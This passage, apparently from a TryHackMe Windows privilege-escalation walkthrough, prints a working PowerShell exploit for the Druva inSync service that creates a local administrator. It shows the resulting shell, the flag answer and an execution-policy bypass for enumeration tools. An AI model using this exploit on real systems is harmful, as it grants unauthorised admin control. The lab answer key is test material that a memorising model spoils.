[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
# The inSync client service listens on localhost TCP 6064.
$s.Connect("127.0.0.1", 6064)
# Protocol banner, then RPC type 5, then the length-prefixed command (UTF-16LE).
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
# The service only checks that the path starts with its own directory, so the ..\ traversal reaches cmd.exe.
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
# Each Send returns the number of bytes written, which is what the script prints when run.
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
This exploit creates the user pwnd with the password SimplePass123 and adds it to the local Administrators group. After running it in PowerShell (the four numbers it prints are the byte counts returned by the Send calls), check the new user's group membership:
PS C:\tools> .\Druva_inSync_exploit.ps1
22
4
4
280
PS C:\tools> net user pwnd
User name pwnd
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/23/2023 8:44:56 AM
Password expires 11/4/2023 8:44:56 AM
Password changeable 9/23/2023 8:44:56 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
To get a shell as the new user, start an elevated PowerShell and enter the pwnd credentials at the UAC prompt:
PS C:\tools> Start-Process powershell -Verb runAs
PS C:\Windows\system32> whoami
wprivesc3\pwnd
PS C:\Windows\system32> type c:\users\administrator\desktop\flag.txt
THM{EZ_DLL_PROXY_4ME}
PS C:\Windows\system32>
Answer: THM{EZ_DLL_PROXY_4ME}
Task 8 Tools of the Trade
WinPEAS
project link:
https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
C:\tools> winpeas.exe > outputfile.txt
PrivescCheck
project link:
https://github.com/itm4n/PrivescCheck
cmd:
C:\tools> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"
powershell:
PS C:\tools> Set-ExecutionPolicy Bypass -Scope process -Force
PS C:\tools> . .\PrivescCheck.ps1
PS C:\tools> Invoke-PrivescCheck -Extended -Report "PrivescCheck_$($env:COMPUTERNAME)"
Metasploit
If you already have a Meterpreter shell on the target system, you can use the multi/recon/local_exploit_suggester module to list vulnerabilities that may affect the target system and allow you to elevate your privileges.